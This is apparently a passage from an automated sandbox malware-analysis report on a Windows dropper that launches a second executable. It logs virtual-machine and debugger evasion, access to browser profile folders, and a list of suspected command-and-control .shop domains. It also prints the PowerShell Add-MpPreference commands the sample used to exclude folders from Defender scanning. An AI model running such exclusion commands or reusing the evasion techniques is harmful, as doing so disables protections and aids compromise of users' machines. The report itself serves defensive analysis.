                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Memory allocated: BE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Memory allocated: 2690000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Memory allocated: 4690000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Window / User API: threadDelayed 4979
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Window / User API: threadDelayed 1732
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6083
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3652
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7901
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1783
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Window / User API: threadDelayed 596
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99888s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99781s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99672s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99554s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99453s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99344s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99234s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99125s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -99016s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98906s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98797s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98687s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98578s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98469s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98351s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98250s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98141s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -98031s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97922s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97812s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97703s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97594s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97484s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97375s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97266s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97156s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -97047s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -96938s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7420 | Thread sleep time: -96811s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7896 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\eXbhgU9.exe TID: 7396 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540 | Thread sleep count: 6083 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536 | Thread sleep count: 3652 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep count: 7901 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744 | Thread sleep count: 1783 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7944 | Thread sleep count: 596 > 30
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7964 | Thread sleep time: -150000s >= -30000s
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe TID: 7968 | Thread sleep time: -30000s >= -30000s
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99888Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99554Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99344Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99125Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 99016Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98906Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98797Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98687Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98578Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98469Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98351Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98250Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98141Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97375Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97266Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97156Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 97047Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 96938Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 96811Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: VBoxService.exe
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ~VirtualMachineTypes
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035181529.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: VMWare
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000C4D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: &VBoxService.exe
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000AB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Thread information set: HideFromDebugger
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Thread information set: HideFromDebugger
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_00AED910 LdrInitializeThunk, 7_2_00AED910
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_03227E99 mov eax, dword ptr fs:[00000030h] 7_2_03227E99
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_0322803D mov eax, dword ptr fs:[00000030h] 7_2_0322803D
                Source: C:\Users\user\Desktop\eXbhgU9.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\eXbhgU9.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                Source: jyidkjkfhjawd.exe String found in binary or memory: cloudewahsj.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: noisycuttej.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: rabidcowse.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: framekgirus.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: tirepublicerj.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: abruptyopsn.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: wholersorie.shop
                Source: jyidkjkfhjawd.exe String found in binary or memory: nearycrepso.shop
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000AB1000.00000040.00000001.01000000.00000008.sdmp String found in binary or memory: abruptyopsn.shoph
                Source: C:\Users\user\Desktop\eXbhgU9.exe Process created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe"
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_00AE8040 cpuid 7_2_00AE8040
                Source: C:\Users\user\Desktop\eXbhgU9.exe Queries volume information: C:\Users\user\Desktop\eXbhgU9.exe VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
